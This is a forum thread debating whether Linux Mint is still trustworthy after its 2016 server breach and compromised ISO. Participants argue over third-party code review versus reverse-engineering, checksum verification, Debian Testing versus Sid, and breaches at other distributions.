Discussion in 'all things UNIX' started by stapp, Feb 21, 2016.
Hilarious. Keeping going.
underlining is mine.
Not much of an answer, is it. Once again something of substance that indicates Mint source code was in some undetected way compromised before last December, please. So far I've just seen that avoided and we already know your opinion.
Mint has it's fans and detractors , just like any other major distro.
I regularly recommend it to people who ask me for help in getting M$ out of their lives for good.
Not surprisingly , I've been reading all I can on this issue , not just on Wilders.
Nothing I have seen so far will cause me to stop recommending Mint.
This thread now has 229 posts and is still going nowhere ..... slowly ...
@MisterB I agree fully with all that you have written here , not least because it is based
on facts and reason.
Jessie is recommended over Sid regarding security:
What's your view on this?
As far as I know, they didn't. And I wouldn't want them doing it either, because code review should be done by 3rd parties (or any kind of investigation).
Take that little text with a lot of salt, because in fact there is another Wiki page that favors Sid over Testing (with real examples that happened on the past). I can't find the link now, but if you keep reading the Wiki pages on Security you'll see that a compromised package can be held on Testing for months, while Sid keeps receiving updates.
So unless you're willing to mix Testing with Sid (not hard considering they're not too far apart), go with Sid all the time. Or Jessie
Wikipedia on code review:https://en.wikipedia.org/wiki/Code_review
This is not the process that would be appropriate to quickly flush out 3rd party alterations to the original developer code. It is an examination of source code for flaws and defects, not an investigatory technique. It won't distinguish whether a section of code was written by the original developer or not. For that, the original developers need to be involved because nobody is going to know or care about the code more than them.
What I'm talking about is applying reverse engineering file analysis techniques that are normally done on binary files and disk images to source code files. They are investigative techniques that can find altered code quickly and that is what you are looking for. There is no need to go though the source code line by line, you just need to find the altered code and remove it as quickly and efficiently as possible.
So I find this insistence on a code review to be a red herring argument. It wouldn't necessarily reveal altered code and not having done one doesn't make the proposition that Mint has had undetected source code alterations any more likely.
Not even the original developers can tell with 100% certainty if a piece of code is theirs, because there's too much code and would be very hard to spot simple changes that weren't made by them.
Potato, potato. You're describing an investigation either way.
Which not even the developers will be able to do. Like they would be able to tell every bit of code was written by them. What a memory they must have to tell if every "yes" or "nay" was their actions.
No, that is not what I'm looking for, specially not with such a poor process (reverse-egnineering).
What I'm looking for is complete source code review done the right way: by reading it completely and via a non-biased/non-involved 3rd party. And I'm not looking for code alterations (because it's impossible for someone to remember every line of code to tell the difference). I'm looking for malicious code, and I'm NOT starting from the premise that the original code is clean.
Starting from the (falsifiable) premise that their original code is clean is not scientific and not philosophical. The correct way to do it is by starting to ask "is the original code clean? We don't know, let's red it".
It doesn't matter what you, me, or the devs think is "altered code", this perspective is flawed as the human memory. The devs won't know if every little line of code is theirs, therefore this process that you're discribing is flawed at it's core. Code review needs to be done by 3rd parties because they're not BIASED to think what is what and because it's sole purpose is to see if there are any malicious code, regardless if it was put there by the devs or by an attacker.
As I was trying to indirectly get my point across in my previous post, it appears the mint developers are at least following due diligence in signing their ISO files with the much stronger PGP key cryptography, resulting in SHA256 checksums, that any user can easily check on most Linux distributions. I just downloaded the latest mint 17.3 xfce version and did from the terminal in my Arch installation:
Go to the download directory where the ISO file is located and enter in terminal
$ sha256sum linuxmint-17.3-xfce-32bit.iso
which resulted in...
You will see this matches SHA256 checksum here: https://mirrors.kernel.org/linuxmint/stable/17.3/sha256sum.txt
Is it not safe to say that if the ISO was tampered with in any way, it will not match the PGP key signed by the developer? Agreed, as I'm just discovering recently, the MD5 checksum is not a safely reliable check, but the much stronger SHA256 checksum should instill pretty good confidence in anyone that sees a match that the ISO is clean.
$ sha256sum linuxmint-17.3-xfce-32bit.iso
I don't think you know much about reverse code engineering. It is commonly used, illegally, for cracking software licensing protections and, legally, to reverse malware and analyze it. It is an investigative technique par excellence and the Mint hack would actually be a fairly easy project to apply it to due to the software being open source. Without malware being reversed and analyzed, we would have no effective protections against it.
That is an absolutely ridiculous argument. What they would have is a lot of material like notes and intermediate draft files that led to the final code placed in the repositories as well as the original copies of the final product. They would also have all kinds of useful meta data like time stamps of when source files were created on the machines that they used to code the source on as well as records of transfers to repositories. They would also be familiar with their code on a level that outsiders would not be on the level of overall structure and when parts of that structure were worked on. They don't need to memorize every line of code. Given the overall competence, and even brilliance, of some of their code--ie drivers and portability--I don't think they would have any trouble figuring out if something in the Mint source code repositories wasn't theirs. All it would take is an A/B difference check and any alterations would stick out like a sore thumb which is exactly what happened with the bad ISO.
And once again, I have to ask for a case history, please. Malware that does nothing after a year or two doesn't seem a likely prospect. Code is meant to be executed and once you have malicious code executing, it can easily be traced to to the source code. Normally, malware is loaded into a debugger for analysis without source code and the best you are going to have is a hard to read disassembly or a decompilation that is just an approximation of the original source code. What an easy prospect to have full source code to work with.
All your description is speculations and your imagination. As mentioned, code review by Mint is useless, because they are the party of interest, the public will not trust whatever they say about their own internal code review. What they need is a peer review from a third party that has not conflict of interest. You have no clue how things work but dare to comment on other people's comment. Bravo!
I'm wondering what is the source of the argument here? Who understands ITIL and compliance better or if Mint is secure as a distro after the breach? I guess it would make more sense to discuss that from the perspective of not what the team can do, as you have no control over that, but you can do and how you can a) identify possible issues b) understand if they are indeed issues 3) fix/mitigate/workaround/neutralize them. And while waiting, should/could you use Mint for secure/private stuff?
Lastly, if other distros have been compromised but you don't know that, are you then ispo facto worried? A tree in the forest syndrome.
Just to remind everyone, shellshock was out and about for 2 years before it was revealed. Was it exploited beforehand? Maybe. Did anyone worry until the public exposure? Probably not. Does it make a difference? Well, maybe, most likely not. But it shows that if a problem is sufficiently big, it will be exposed. That's how it normally works. So the best proof of pudding is the lack of custard.
Maybe I should rant about this properly ...
Shellshock and heartbleed and bash disaster etc is not comparable to the recent Mint breach. Shellshock, for example, are security holes that are inevitable in any sort of software, not only in open source. These were not present because of someone intentionally plant it into Linux.
The Mint breach, on the other hand, is something that was caused by the malpractice by the Mint team when they handled security measures of their Server, their distro, i.e., their philosophy is flawed. Such kind of breach should and could have been avoided in the first place.
That, again, is the presumtion that the rest of the code is clean and we know if/where the malware is. We don't know any of that, we don't even know if there's more malware in Mint, and using this technique is pointless. Reading the source code is much more simpler and gives an overall view of how Mint is doing.
AGAIN, you don't know of the integrity of any of this material.
I don't care about their own review. It's like if the police of some city ran an investigation of corruption on it's own department: it makes no ***** sense.
Review, specially in regards to security, should be done by outsiders.
And I find it funny that you actually trust their "metadata and notes and timestamps", like those couldn't have been compromised either.
Which is exactly why their own review would be pointless.
Everyone is entitled to their opinion (especially on the brilliance part, considering how Mint is glued with duct tape so it doesn't fall apart).
So you actually think it's possible. Laughable.
Actually, this is exactly what I would do. Make the infection silent for years while gathering as much users as possible, while not gaining attention. And it has been done like so in the past.
Not necessarily right away.
Not so soon, if the code is well done.
Which is only doable if:
We don't have the source code (which we do on Mint);
We KNOW the malware (which we don't on Mint);
The only possible way of knowing if there's malicious code in Mint is by looking at the source code.
None, at least for me. I just commented I wouldn't use Mint, because this massive breach just shows they can't handle security, be it on their servers or the distro itself. The only way of knowing the current state of Mint is by looking at the source code. There's no way of telling if the the source code, be it new or old, is clean.
That's actually pretty logical.
a) identify possible issues: only possible through source code review;
b) if there are issues, proceed to next step;
c) if malicious code is present, Mint devs should remove it from the tree and make as much effort as possible to secure their machines (work, servers, etc);
I wouldn't use Mint. This hack just shows how bad their security policies were, and nothing guarantees old code is clean. We don't know if Mint is safe to use, even with the GPG/SHA verifications they put out.
Other distros don't deal with security the same a 2-yo child deals with security.
The problem is, it's possible that other Mint problems haven't gone public. For example:
The OpenBSD project developers are constantly reviewing source code, improving it, etc. Then, a claim rose that a backdoor planted by the NSA was in the source code. What did those guys do? They reviewed the entire code, and no backdoor wasfound. However, other bugs and problems were found and fixed, everybody wins.
Lack of evidence doesn't mean lack of existance
Not a bad idea...
In general it does. As I said before, it is sheer foolishness to put remote possibilities out as anything more than that and making security decisions based on such FUD is only beneficial to attackers, not defenders. Ignoring the lack of actual case history evidence just puts it farther into the realm of fantasy, not reality. Once again, a real example please, not just FUD and theory that isn't supported by any real evidence. The burden of proof is on you, not Mint.
My 2 cents worth on all this is that I totally agree... We gotta live..
No, it doesn't. Not when similar cases happened before; but only when the possibility is ruled to near zero. And that is, of course, the general rule, because we don't understand how everything works and thus even if something is ruled to near zero chance, it's still possible to happen.
Just because humans couldn't fly until 1903, doesn't mean it's not possible.
Just because we haven't stepped on the moon until 1969, doesn't mean it's not possible.
Did I put the (not so) remote possibility as more than that? If you think so, then clearly you can't read and are just typing on the same key.
LOL, inverting the burden of proof when in fact I never said Mint has malicious code and repeated many times that we need to read the code to see what's going on there. This is just pure stupidity at it's best.
I have a general question for anyone here: Do the other distros, let's just say Debian, Ubuntu, OpenSUSE, Fedora, etc, do these do "code reviews" like you're talking about? Is Mint the only one of all these that doesn't, or hasn't?
Just to put things in perspective here are some actual case histories of other distros having server hacks over the last few years. It only took a few minutes with Google to dig this up. All I had to do is put the name of a distro in front of the word "hacked". Ubuntu, Fedora, OpenSuse, Debian, they've all gotten hacked at some time within the last few years. So were going to single out Mint as untrustworthy because their severs were breached and ignore the fact that it has happened to all the other major distros? Come on people, it is time to put facts before FUD. If we were to follow some of the FUD that is being put out here, we wouldn't be using Linux at all and gagging on Windows 10.
@Kerodo None of the mentioned distros have such bad security management as Mint had. Getting hacked can happen to anyone: Google, Facebook, NASA. But most of these actually do have a good notion of security and actually do a good job of keeping their systems secure.
Exactly... this is my point I guess. Why single Mint out when it can, and evidently has, happened to many of them. I think what's called for here is for everyone to be REASONABLE.
Because others actually care about security and try their best to avoid being cracked.
Mint, on the other hand, can be compared to a drunk driver: he says he's not drunk, that he doesn't need the seat belt, and that going 200 mp/h is fine in those conditions. And he doesn't do any maintenance to his car whatsoever. It's an obvious recipe for disaster.
Google/Debian/openSUSE/Ubuntu, on the other hand, doesn't drink, uses the seat belt, drives at 20 mp/h, and does regular preventive maintenances. Obviously maintenance can't pick out every single defect that wear can produce on the car, so there is the possibility that a tire blows earlier than expected, but obviously it almost never happened and Google tried to avoid it at all costs. And, of course, the damage won't be so great because the driver is driving the car slowly and it's easy to come to a stop then change the tire.
You might read the articles. It doesn't look like security was all that sound on their servers either and the Fedora hack could have done deep damage. None of these distros emphasize security in any big way like Qubes.
Some of these are actually kind of funny to read I must admit, some of these breaches were pretty easy to exploit, and I feel ashamed of some admins.
Haven't read much on Qubes, but I've always read nice things about it. I might check on them more
Separate names with a comma.